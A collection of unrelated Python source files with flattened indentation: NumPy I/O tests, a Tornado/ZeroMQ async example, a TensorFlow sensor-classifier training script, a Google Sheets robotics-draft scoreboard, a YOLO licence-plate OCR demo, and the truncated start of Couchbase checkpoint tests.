if sys.version_info[0] >= 3:
# python 3k is known to fail for '\r'
linesep = ('\n', '\r\n')
else:
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
f, name = mkstemp()
# We can't use NamedTemporaryFile on windows, because we cannot
# reopen the file.
try:
os.write(f, asbytes(data))
assert_array_equal(np.genfromtxt(name), wanted)
finally:
os.close(f)
os.unlink(name)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokeness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
gc.collect()
n_before = len(gc.get_objects())
np.load(f)
n_after = len(gc.get_objects())
assert_equal(n_before, n_after)
if __name__ == "__main__":
run_module_suite()
|
asyncweb.py
|
"""Async web request example with tornado.
Requests to localhost:8888 will be relayed via 0MQ to a slow responder,
who will take 1-5 seconds to respond. The tornado app will remain responsive
duriung this time, and when the worker replies, the web request will finish.
A '.' is printed every 100ms to demonstrate that the zmq request is not blocking
the event loop.
"""
import sys
import random
import threading
import time
import zmq
from zmq.eventloop import ioloop, zmqstream
"""
ioloop.install() must be called prior to instantiating *any* tornado objects,
and ideally before importing anything from tornado, just to be safe.
install() sets the singleton instance of tornado.ioloop.IOLoop with zmq's
IOLoop. If this is not done properly, multiple IOLoop instances may be
created, which will have the effect of some subset of handlers never being
called, because only one loop will be running.
"""
ioloop.install()
import tornado
from tornado import web
def slow_responder():
"""thread for slowly responding to replies."""
ctx = zmq.Context.instance()
socket = ctx.socket(zmq.REP)
socket.linger = 0
socket.bind('tcp://127.0.0.1:5555')
i=0
while True:
msg = socket.recv()
print "\nworker received %r\n" % msg
time.sleep(random.randint(1,5))
socket.send(msg + " to you too, #%i" % i)
i+=1
def dot():
"""callback for showing that IOLoop is still responsive while we wait"""
sys.stdout.write('.')
sys.stdout.flush()
class TestHandler(web.RequestHandler):
@web.asynchronous
def get(self):
ctx = zmq.Context.instance()
s = ctx.socket(zmq.REQ)
s.connect('tcp://127.0.0.1:5555')
# send request to worker
s.send('hello')
self.stream = zmqstream.ZMQStream(s)
self.stream.on_recv(self.handle_reply)
def handle_reply(self, msg):
# finish web request with worker's reply
reply = msg[0]
print "\nfinishing with %r\n" % reply,
self.stream.close()
self.write(reply)
self.finish()
def main():
worker = threading.Thread(target=slow_responder)
worker.daemon=True
worker.start()
application = web.Application([(r"/", TestHandler)])
beat = ioloop.PeriodicCallback(dot, 100)
beat.start()
application.listen(8888)
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print ' Interrupted'
if __name__ == "__main__":
main()
|
train_model.py
|
# coding: utf-8
# MultiPerceptron
# queueを使った学習
# 学習step数を記録
# 学習データはCSVの代わりにジェネレータを搭載
# 3x11x4のNNモデルに変更
# scoreを追加
import os
_FILE_DIR=os.path.abspath(os.path.dirname(__file__))
import time
import tensorflow as tf
import threading
from sklearn.utils import shuffle
import sys
sys.path.append(_FILE_DIR+'/..')
from generator.labelgenerator import LabelGenerator
import numpy as np
import logging
# ログ設定
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] time:%(created).8f pid:%(process)d pn:%(processName)-10s tid:%(thread)d tn:%(threadName)-10s fn:%(funcName)-10s %(message)s',
)
tf.reset_default_graph()
MODEL_DIR=_FILE_DIR+"/model"
SUMMARY_LOG_DIR=_FILE_DIR+"/log"
if not os.path.exists(MODEL_DIR):
os.makedirs(MODEL_DIR)
N_NODES_HL1 = 11
DATA_COLS = 3 # センサーの数。left45,front,right45
N_CLASSES = 4 # 予測結果の数。stop,left,forward,right
BATCH_SIZE = 100 # バッチサイズは10〜100前後に
CHUNK_SIZE = BATCH_SIZE*1 # queueで保持するデータ件数
N_THREADS = 1 # データ生成スレッド件数。ミニバッチデータ作成時間より学習時間の方が処理負荷が高いので、データ生成スレッドは1スレッドにする
TARGET_STEP = 10000 # ステップ数
TEST_NUM = 10000 # テストデータ件数
generator = LabelGenerator()
def generate_random_train_data(n_rows):
'''
ランダムなセンサー値と、それに対応するラベルデータを作成する
args:
n_rows: 作成するデータ件数
return:
batch_data: センサー値
batch_target: ラベルデータ
'''
csvdata=[]
# 2m以内のランダムなINT値を作成する
sensors = np.random.randint(0,200,[n_rows,DATA_COLS])
for i in range(n_rows):
generator_result = generator.get_label(sensors[i])
csvrow = np.hstack((sensors[i],generator_result))
csvdata.append(csvrow)
csvdata = np.array(csvdata)
batch_data = csvdata[0:n_rows,0:DATA_COLS]
batch_target = csvdata[0:n_rows,DATA_COLS:]
return batch_data, batch_target
def load_and_enqueue(sess):
while True:
try:
batch_data, batch_target = generate_random_train_data(BATCH_SIZE)
sess.run(enqueue_op, feed_dict={placeholder_input_data:batch_data, placeholder_input_target:batch_target})
#logging.debug("running")
except tf.errors.CancelledError as e:
break
print("finished enqueueing")
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
with tf.variable_scope("input"):
placeholder_input_data = tf.placeholder('float', [None, DATA_COLS], name='input_data') # for load_and_enqueue. use dequeue_op:0 for prediction
placeholder_input_target = tf.placeholder('float', name='input_target') # for load_and_enqueue. use dequeue_op:1 for prediction
placeholder_batch_size = tf.placeholder(tf.int32, name='batch_size') # need feed_dict in training sess.run(). don't need for prediction.
with tf.variable_scope("step"):
placeholder_step = tf.placeholder(tf.int32, name='input_step') # step値入力用
variable_step = tf.Variable(initial_value=0, name="step") # step記録用
step_op = variable_step.assign(placeholder_step)
with tf.variable_scope("queue"):
queue = tf.FIFOQueue(
capacity=CHUNK_SIZE, # enqueue size
dtypes=['float', 'float'],
shapes=[[DATA_COLS], [N_CLASSES]],
name='FIFOQueue'
)
# Enqueue and dequeue operations
enqueue_op = queue.enqueue_many([placeholder_input_data, placeholder_input_target], name='enqueue_op')
# dequeue_manyでBATCH_SIZE分のデータを取得する。テストデータや実際に予測時に使う可変個数のデータ件数に対応するためにplaceholderで取得件数を指定する。
dequeue_input_data, dequeue_input_target = queue.dequeue_many(placeholder_batch_size, name='dequeue_op') # instead of data/target placeholder
with tf.variable_scope('neural_network_model'):
# 中間層定義
hidden_layer_1 = {'weights':tf.Variable(weight_variable([DATA_COLS, N_NODES_HL1])),
'biases':tf.Variable(bias_variable([N_NODES_HL1]))}
# 出力層定義
output_layer = {'weights':tf.Variable(weight_variable([N_NODES_HL1, N_CLASSES])),
'biases':tf.Variable(bias_variable([N_CLASSES])),}
# 中間層計算
layer_1 = tf.add(tf.matmul(dequeue_input_data,hidden_layer_1['weights']), hidden_layer_1['biases'])
layer_1 = tf.nn.relu(layer_1)
# 予測結果(出力層計算)
prediction = tf.add(tf.matmul(layer_1,output_layer['weights']), output_layer['biases'], name='output_y')
# スコア
score = tf.nn.softmax(prediction, name='score')
with tf.variable_scope('loss'):
losses = tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=dequeue_input_target)
loss_op = tf.reduce_mean(losses, name='cost')
tf.summary.scalar('loss', loss_op)
with tf.variable_scope('accuracy'):
correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(dequeue_input_target, 1))
accuracy = tf.reduce_mean(tf.cast(correct, 'float'), name='accuracy')
tf.summary.scalar('accuracy', accuracy)
summary_op = tf.summary.merge_all()
train_op = tf.train.AdamOptimizer(0.0001).minimize(loss_op, name='train_op')
test_data, test_target =generate_random_train_data(TEST_NUM)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session() as sess:
ckpt = tf.train.get_checkpoint_state(MODEL_DIR)
if ckpt:
# checkpointファイルから最後に保存したモデルへのパスを取得する
last_model = ckpt.model_checkpoint_path
print("load {}".format(last_model))
# 学習済みモデルを読み込む
saver.restore(sess, last_model)
else:
print("initialization")
# 初期化処理
init_op = tf.global_variables_initializer()
sess.run(init_op)
writer = tf.summary.FileWriter(SUMMARY_LOG_DIR, sess.graph)
start_time, start_clock = time.time(), time.clock()
# 学習データ ジェネレータを用いてミニバッチデータを作成し、enqueue_op実行によりqueueへデータを挿入するスレッドを開始する
for i in range(N_THREADS):
enqueue_thread = threading.Thread(target=load_and_enqueue, args=[sess])
enqueue_thread.isDaemon()
enqueue_thread.start()
step = 0 # 最後にstep数をモデルに記録するために変数を用意しておく
try:
# step取得
_step = sess.run(variable_step)
print("learned step:{}".format(_step))
# 学習開始時点での精度表示
print(sess.run(accuracy, feed_dict={placeholder_batch_size:BATCH_SIZE}))
for step in range(_step+1, TARGET_STEP+1):
batch_loss=0
w_summary=None
_, batch_loss, w_summary = sess.run([train_op, loss_op, summary_op],
feed_dict={placeholder_batch_size:BATCH_SIZE})
if step % 1000 == 0:
if not w_summary is None:
writer.add_summary(w_summary, step)
ac = sess.run(accuracy, feed_dict={placeholder_batch_size:BATCH_SIZE})
# テストデータでの精度を確認する
test_accuracy = accuracy.eval({'queue/dequeue_op:0':test_data,
'queue/dequeue_op:1':test_target})
if step % 10000 == 0:
print("Step:%d accuracy:%.8f test_accuracy:%.8f loss:%.8f time:%.8f clock:%.14f" % (step,ac,test_accuracy,batch_loss,time.time()-start_time,time.clock()-start_clock))
# 1000000 step毎にsaveする
if step % 1000000 == 0:
_step = sess.run(step_op,feed_dict={placeholder_step:step}) # variable_stepにstepを記録する
saver.save(sess, MODEL_DIR + '/model-'+str(step)+'.ckpt')
except:
import traceback
traceback.print_exc()
finally:
sess.run(queue.close(cancel_pending_enqueues=True))
pass
# ステップ学習時、保存する
if step > _step:
_step = sess.run(step_op,feed_dict={placeholder_step:step}) # variable_stepにstepを記録する
saver.save(sess, MODEL_DIR + '/model-'+str(step)+'.ckpt')
# テストデータを新たに生成し、精度を確認する
test_data, test_target =generate_random_train_data(TEST_NUM)
print('Accuracy:',accuracy.eval({dequeue_input_data:test_data,
dequeue_input_target:test_target}))
# 総step数を表示する
print('step:{}'.format(sess.run(variable_step)))
print("end")
|
scoreboard.py
|
from oauth2client.service_account import ServiceAccountCredentials
import gspread
from tba import *
import draft
import settings
import threading
"""scoreboard.py: Automatically updates the scoreboard. Thanks TBA"""
TITLE = settings.SCOREBOARD_TITLE
def auth(creds_file):
scope = [
'https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive.file'
]
credentials = ServiceAccountCredentials.from_json_keyfile_name(creds_file, scope)
gc = gspread.authorize(credentials)
return gc
def get_scoreboard(gc):
title = TITLE
try:
sh = gc.open(title)
except gspread.exceptions.SpreadsheetNotFound:
return False
return sh.get_worksheet(0)
def create_scoreboard(creds_file, admin_file, participants_file):
gc = auth(creds_file)
title = TITLE
sh = get_scoreboard(gc)
if not sh:
sh = gc.create(title)
admin_csv = open(admin_file, 'r')
admin_csv_reader = csv.DictReader(admin_csv, delimiter="\t")
for i in admin_csv_reader:
sh.share(i['Email'], perm_type='user', role='writer')
participants_csv = open(participants_file, 'r')
participants_csv_reader = csv.DictReader(participants_csv, delimiter="\t")
names = []
for i in participants_csv_reader:
names.append(i['Name'])
wks = sh.get_worksheet(0)
wks.update_acell('A1', 'Name')
for i in range(7):
wks.update_cell(1, i + 2, 'Week {}'.format(i + 1))
for i in range(len(names)):
cell = "A{}".format(i+2)
name = names[i]
wks.update_acell(cell, name)
def score_week(creds_file, week, year, award_scoring):
gc = auth(creds_file)
wks = get_scoreboard(gc)
dft = draft.get_draft(gc, week)
col = wks.find('Week {}'.format(week)).col
names = [x for x in wks.col_values(1)[1:] if x != ""]
threads = []
for name in names:
t = threading.Thread(target=score_player, args=(dft, wks, col, name, week, year, award_scoring,))
threads.append(t)
t.start()
def score_player(dft, wks, col, name, week, year, award_scoring):
dftrow = dft.find(name).row
picks = [x for x in dft.row_values(dftrow)[1:] if x != ""]
score = 0
for pick in picks:
score += score_team(pick, week, year, award_scoring, name, False)
wks.update_cell(wks.find(name).row, col, score)
def score_team(number, week, year, award_scoring, player, debug):
team = Team.get_team(number)
if debug:
print("Number", number)
event = team.get_event_week(week, year)
if not event or event is None:
if debug:
print("TEAM MISSING EVENT: ", number)
return 0
event_key = event.get_key()
if debug:
print(event_key)
awards = team.get_awards(event_key)
csvfile = open(award_scoring, 'r').read()
csv = []
for i in csvfile.split("\n")[1:]:
csv.append(i.split("\t"))
score = 0
for award in awards:
type = award.get_type()
for i in csv:
print(i[1])
if str(type) == str(i[1]):
if debug:
print(i[0], int(i[2]))
score += int(i[2])
break
score += 2
if debug:
print("score", score)
matches = team.get_matches(event_key)
highest_level = 0
for match in matches:
if match.get_level() == 'qf':
if highest_level < 1:
highest_level = 1
elif match.get_level() == 'sf':
if highest_level < 2:
highest_level = 2
elif match.get_level() == 'f':
highest_level = 2
if highest_level == 2:
if debug:
print('semi')
score += 10
elif highest_level == 1:
if debug:
print('quarter')
score += 4
ranking_score = event.get_team_stat_number(number, 2)
if debug:
print("ranking score", ranking_score)
score += int(ranking_score)
ranking = event.get_team_ranking(number)
if debug:
print("team:ranking",number,ranking)
if ranking is None and debug:
print("Missing", number)
elif ranking == 1:
score += 20
elif ranking <= 3:
score += 12
elif ranking <= 8:
score += 6
elif ranking <= 12:
score += 3
elif ranking <= 16:
score += 2
if debug:
print(ranking)
print(score)
print(player, number, score, sep='\t')
return score
|
darknet_video.py
|
from ctypes import *
import math
import random
import os
import cv2
import numpy as np
import time
import darknet
import pytesseract
from skimage import measure
import threading
from scipy.spatial import distance as dist
from collections import OrderedDict
from multiprocessing import Process, Lock
lic_pl = cv2.imread("test.png")
f=False
class CentroidTracker:
def __init__(self,maxDisappeared=30):
self.nextObjectID = 0
self.objects = OrderedDict()
self.disappeared = OrderedDict()
self.maxDisappeared = maxDisappeared
def register(self, centroid):
self.objects[self.nextObjectID] = centroid
self.disappeared[self.nextObjectID] = 0
self.nextObjectID+=1
def deregister(self, objectID):
del self.objects[objectID]
del self.disappeared[objectID]
def update(self, rects):
if len(rects) == 0:
for objectID in list(self.disappeared.keys()):
self.disappeared[objectID] += 1
if self.disappeared[objectID] >= self.maxDisappeared:
self.deregister(objectID)
return self.objects
inputCentroids = np.zeros((len(rects),2), dtype="int")
for (i, (cX,cY)) in enumerate(rects):
inputCentroids[i] = (cX,cY)
if len(self.objects)==0:
for i in range(len(inputCentroids)):
self.register(inputCentroids[i])
else:
objectIDs = list(self.objects.keys())
objectCentroids = list(self.objects.values())
D = dist.cdist(np.array(objectCentroids), inputCentroids)
rows = D.min(axis=1).argsort()
cols = D.argmin(axis=1)[rows]
usedRows = set()
usedCols = set()
for (row,col) in zip(rows,cols):
if row in usedRows or col in usedCols:
continue
objectID = objectIDs[row]
self.objects[objectID] = inputCentroids[col]
self.disappeared[objectID] = 0
usedRows.add(row)
usedCols.add(col)
unusedRows = set(range(0,D.shape[0])).difference(usedRows)
unusedCols = set(range(0,D.shape[1])).difference(usedCols)
if D.shape[0]>=D.shape[1]:
for row in unusedRows:
objectID = objectIDs[row]
self.disappeared[objectID] += 1
if self.disappeared[objectID] > self.maxDisappeared:
self.deregister(objectID)
else:
for col in unusedCols:
self.register(inputCentroids[col])
return self.objects
def convertBack(x, y, w, h):
xmin = int(round(x - (w / 2)))
xmax = int(round(x + (w / 2)))
ymin = int(round(y - (h / 2)))
ymax = int(round(y + (h / 2)))
return xmin, ymin, xmax, ymax
def ocr():
global lic_pl, f
while(True):
if(f==True):
configuration = ("-l eng --oem 1 --psm 8")
text = pytesseract.image_to_string(lic_pl, config=configuration)
print(text)
cv2.imshow("d",lic_pl)
cv2.waitKey(3)
f=False
def cvDrawBoxes(detections, img):
global lic_pl, f
#img = cv2.resize(img,(1920,1080),interpolation = cv2.INTER_AREA)
for detection in detections:
if detection[0]==b'PLATE':
x, y, w, h = detection[2][0],\
detection[2][1],\
detection[2][2],\
detection[2][3]
#print(x,y)
xmin, ymin, xmax, ymax = convertBack(
float(x), float(y), float(w), float(h))
pt1 = (int((xmin/416.0)*img.shape[1]), int((ymin/416.0)*img.shape[0]))
pt2 = (int((xmax/416.0)*img.shape[1]), int((ymax/416.0)*img.shape[0]))
#pt1 = (xmin, ymin)
#pt2 = (xmax,ymax)
#print(pt1, pt2)
cv2.rectangle(img, pt1, pt2, (0, 255, 0), 1)
cv2.putText(img,
detection[0].decode() +
" [" + str(round(detection[1] * 100, 2)) + "]",
(pt1[0], pt1[1] - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
[0, 255, 0], 2)
org_img = img[pt1[1]:pt2[1],pt1[0]:pt2[0]]
hsv = cv2.cvtColor(org_img, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(hsv,(5,5),0)
ret3,binary_img = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
c_img = cv2.bitwise_not(binary_img)
#cv2.imshow("tes",binary_img)
#cv2.waitKey(0)
image, contours, hier = cv2.findContours(c_img, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)
contours = sorted(contours, key=lambda ctr: cv2.boundingRect(ctr)[0])
xmin=30
character_dimensions = (0.25*org_img.shape[0], 0.70*org_img.shape[0], 0.01*org_img.shape[1], 0.25*org_img.shape[1])
min_height, max_height, min_width, max_width = character_dimensions
new_im = cv2.imread("test.png")
d=0
for ctr in contours:
# Get bounding box
x, y, w, h = cv2.boundingRect(ctr)
# Getting ROI
if w>min_width and w<max_width and h>min_height and h<max_height:
d+=1
roi = cv2.cvtColor(binary_img[y:y+h, x:x+w],cv2.COLOR_GRAY2RGB)
#char.append(cv2.resize(roi,(50,75),interpolation = cv2.INTER_AREA))
new_im[38:113, xmin:xmin+50] = cv2.resize(roi,(50,75),interpolation = cv2.INTER_AREA)
xmin+=70
#cv2.imshow('character',roi)
#cv2.imwrite('character_%d.png'%d, roi)
#cv2.waitKey(0)
#cv2.destroyAllWindows()
cv2.imshow("d",new_im[:,:xmin])
cv2.waitKey(3)
if d>6 and d<11:
lic_pl = new_im[:,:xmin]
configuration = ("-l eng --oem 1 --psm 8")
text = pytesseract.image_to_string(new_im[:,:xmin], config=configuration)
print(text)
return img
netMain = None
metaMain = None
altNames = None
def YOLO():
global metaMain, netMain, altNames
configPath = "yolov3test.cfg"
weightPath = "yolov3test_last.weights"
metaPath = "obj.data"
if not os.path.exists(configPath):
raise ValueError("Invalid config path `" +
os.path.abspath(configPath)+"`")
if not os.path.exists(weightPath):
raise ValueError("Invalid weight path `" +
os.path.abspath(weightPath)+"`")
if not os.path.exists(metaPath):
raise ValueError("Invalid data file path `" +
os.path.abspath(metaPath)+"`")
if netMain is None:
netMain = darknet.load_net_custom(configPath.encode(
"ascii"), weightPath.encode("ascii"), 0, 1) # batch size = 1
if metaMain is None:
metaMain = darknet.load_meta(metaPath.encode("ascii"))
if altNames is None:
try:
with open(metaPath) as metaFH:
metaContents = metaFH.read()
import re
match = re.search("names *= *(.*)$", metaContents,
re.IGNORECASE | re.MULTILINE)
if match:
result = match.group(1)
else:
result = None
try:
if os.path.exists(result):
with open(result) as namesFH:
namesList = namesFH.read().strip().split("\n")
altNames = [x.strip() for x in namesList]
except TypeError:
pass
except Exception:
pass
cap = cv2.VideoCapture(0)
cap = cv2.VideoCapture("tt.mp4")
cap.set(3, 1280)
cap.set(4, 720)
out = cv2.VideoWriter(
"output.avi", cv2.VideoWriter_fourcc(*"MJPG"), 10.0,
(darknet.network_width(netMain), darknet.network_height(netMain)))
print("Starting the YOLO loop...")
# Create an image we reuse for each detect
darknet_image = darknet.make_image(darknet.network_width(netMain),
darknet.network_height(netMain),3)
while True:
prev_time = time.time()
ret, frame_read = cap.read()
if ret==False:
break
frame_rgb = cv2.cvtColor(frame_read, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb,
(darknet.network_width(netMain),
darknet.network_height(netMain)),
interpolation=cv2.INTER_LINEAR)
darknet.copy_image_from_bytes(darknet_image,frame_resized.tobytes())
detections = darknet.detect_image(netMain, metaMain, darknet_image, thresh=0.25)
#print(detections)
image = cvDrawBoxes(detections, frame_rgb)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
print(1/(time.time()-prev_time))
#cv2.imshow('Demo', image)
#cv2.waitKey(3)
#cv2.imwrite('Demo.png', image)
#cv2.waitKey(3)
cap.release()
out.release()
if __name__ == "__main__":
p = Process(target=YOLO)
p.start()
|
checkpoint.py
|
import re
import time
import uuid
import logger
from threading import Thread
from tasks.future import TimeoutError
from couchbase_helper.cluster import Cluster
from couchbase_helper.stats_tools import StatsCommon
from membase.api.rest_client import RestConnection
from membase.helper.cluster_helper import ClusterOperationHelper
from basetestcase import BaseTestCase
from couchbase_helper.documentgenerator import BlobGenerator
from remote.remote_util import RemoteMachineShellConnection
import testconstants
ACTIVE = "active"
REPLICA1 = "replica1"
REPLICA2 = "replica2"
REPLICA3 = "replica3"
class CheckpointTests(BaseTestCase):
def setUp(self):
super(CheckpointTests, self).setUp()
self.checkpoint_size = self.input.param("checkpoint_size", 5000)
self.value_size = self.input.param("value_size", 256)
self.timeout = self.input.param("timeout", 60)
servers_in = [self.servers[i + 1] for i in range(self.num_servers - 1)]
self.cluster.rebalance(self.servers[:1], servers_in, [])
self.bucket = self.buckets[0]
self.master = self._get_server_by_state(self.servers[:self.num_servers], self.bucket, ACTIVE)
if self.num_servers > 1:
self.replica1 = self._get_server_by_state(self.servers[:self.num_servers], self.bucket, REPLICA1)
if self.num_servers > 2:
self.replica2 = self._get_server_by_state(self.servers[:self.num_servers], self.bucket, REPLICA2)
if self.num_servers > 3:
self.replica3 = self._get_server_by_state(self.servers[:self.num_servers], self.bucket, REPLICA3)
def tearDown(self):
super(CheckpointTests, self).tearDown()
def checkpoint_create_items(self):
"""Load data until a new checkpoint is created on all replicas"""
param = 'checkpoint'
stat_key = 'vb_0:open_checkpoint_id'
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, str(self.checkpoint_size))
chk_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, generate_load, "create", 0, 1, 0, True, batch_size=self.checkpoint_size, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
self._verify_checkpoint_id(param, stat_key, chk_stats)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
def checkpoint_create_time(self):
"""Load data, but let the timeout create a new checkpoint on all replicas"""
param = 'checkpoint'
stat_key = 'vb_0:open_checkpoint_id'
self._set_checkpoint_timeout(self.servers[:self.num_servers], self.bucket, str(self.timeout))
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, generate_load, "create", 0, 1, 0, True, batch_size=self.checkpoint_size, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
chk_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
self.log.info("Sleeping for {0} seconds)".format(self.timeout + 5))
time.sleep(self.timeout + 5)
self._verify_checkpoint_id(param, stat_key, chk_stats)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
def checkpoint_replication_pause(self):
"""With 3 replicas load data. pause replication to R2. Let checkpoints close on Master and R1.
Restart replication of R2 and R3, backfill should not be seen on R1 and R2."""
param = 'checkpoint'
stat_key = 'vb_0:last_closed_checkpoint_id'
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, str(self.checkpoint_size))
time.sleep(5)
prev_backfill_timestamp_R1 = self._get_backfill_timestamp(self.replica1, self.replica2)
prev_backfill_timestamp_R2 = self._get_backfill_timestamp(self.replica2, self.replica3)
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
data_load_thread = Thread(target=self._load_all_buckets,
name="load_data",
args=(self.master, generate_load, "create", 0, 1, 0, True, self.checkpoint_size, 5, 180))
data_load_thread.start()
self._stop_replication(self.replica2, self.bucket)
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
chk_pnt = int(m_stats[m_stats.keys()[0]]) + 2
tasks = []
tasks.append(self.cluster.async_wait_for_stats([self.master], self.bucket, param, stat_key,
'>=', chk_pnt))
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param, stat_key,
'>=', chk_pnt))
for task in tasks:
try:
task.result(60)
except TimeoutError:
self.fail("Checkpoint not closed")
data_load_thread.join()
self._start_replication(self.replica2, self.bucket)
self._verify_checkpoint_id(param, stat_key, m_stats)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
self._verify_backfill_happen(self.replica1, self.replica2, prev_backfill_timestamp_R1)
self._verify_backfill_happen(self.replica2, self.replica3, prev_backfill_timestamp_R2)
def checkpoint_collapse(self):
"""With 3 replicas, stop replication on R2, let Master and R1 close checkpoint.
Run load until a new checkpoint is created on Master and R1.
Wait till checkpoints merge on R1. Restart replication of R2.
Checkpoint should advance to the latest on R2."""
param = 'checkpoint'
stat_key = 'vb_0:last_closed_checkpoint_id'
stat_chk_itms = 'vb_0:num_checkpoint_items'
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, str(self.checkpoint_size))
self._stop_replication(self.replica2, self.bucket)
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
data_load_thread = Thread(target=self._load_all_buckets,
name="load_data",
args=(self.master, generate_load, "create", 0, 1, 0, True, self.checkpoint_size, 5, 180))
data_load_thread.start()
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
tasks = []
chk_pnt = int(m_stats[m_stats.keys()[0]]) + 2
tasks.append(self.cluster.async_wait_for_stats([self.master], self.bucket, param, stat_key,
'>=', chk_pnt))
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param, stat_key,
'>=', chk_pnt))
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param,
stat_chk_itms, '>=', self.num_items))
data_load_thread.join()
for task in tasks:
try:
task.result(60)
except TimeoutError:
self.fail("Checkpoint not collapsed")
tasks = []
self._start_replication(self.replica2, self.bucket)
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param,
stat_chk_itms, '<', self.num_items))
for task in tasks:
try:
task.result(60)
except TimeoutError:
self.fail("Checkpoints not replicated to replica2")
self._verify_checkpoint_id(param, stat_key, m_stats)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
def checkpoint_deduplication(self):
"""Disable replication of R1. Load N items to master, then mutate some of them.
Restart replication of R1, only N items should be in stats. In this test, we can
only load number of items <= checkpoint_size to observe deduplication"""
param = 'checkpoint'
stat_key = 'vb_0:num_open_checkpoint_items'
stat_key_id = 'vb_0:open_checkpoint_id'
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, self.checkpoint_size)
self._stop_replication(self.replica1, self.bucket)
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
generate_update = BlobGenerator('nosql', 'sql-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, generate_load, "create", 0, 1, 0, True, batch_size=self.checkpoint_size, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets([self.master, self.replica2, self.replica3])
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key_id)
data_load_thread = Thread(target=self._load_all_buckets,
name="load_data",
args=(self.master, generate_update, "update", 0, 1, 0, True, self.checkpoint_size, 5, 180))
data_load_thread.start()
self._start_replication(self.replica1, self.bucket)
data_load_thread.join()
chk_pnt = int(m_stats[m_stats.keys()[0]])
timeout = 60 if (self.num_items * .001) < 60 else self.num_items * .001
time.sleep(timeout)
tasks = []
tasks.append(self.cluster.async_wait_for_stats([self.master], self.bucket, param,
stat_key, '==', self.num_items))
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param,
stat_key, '==', self.num_items))
tasks.append(self.cluster.async_wait_for_stats([self.master], self.bucket, param,
stat_key_id, '==', chk_pnt))
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param,
stat_key_id, '==', chk_pnt))
for task in tasks:
try:
task.result(60)
except TimeoutError:
self.fail("Items weren't deduplicated")
self._verify_stats_all_buckets(self.servers[:self.num_servers])
def checkpoint_failover_master(self):
"""Load N items. During the load, failover Master.
Verify backfill doesn't happen on R1, R2."""
param = 'checkpoint'
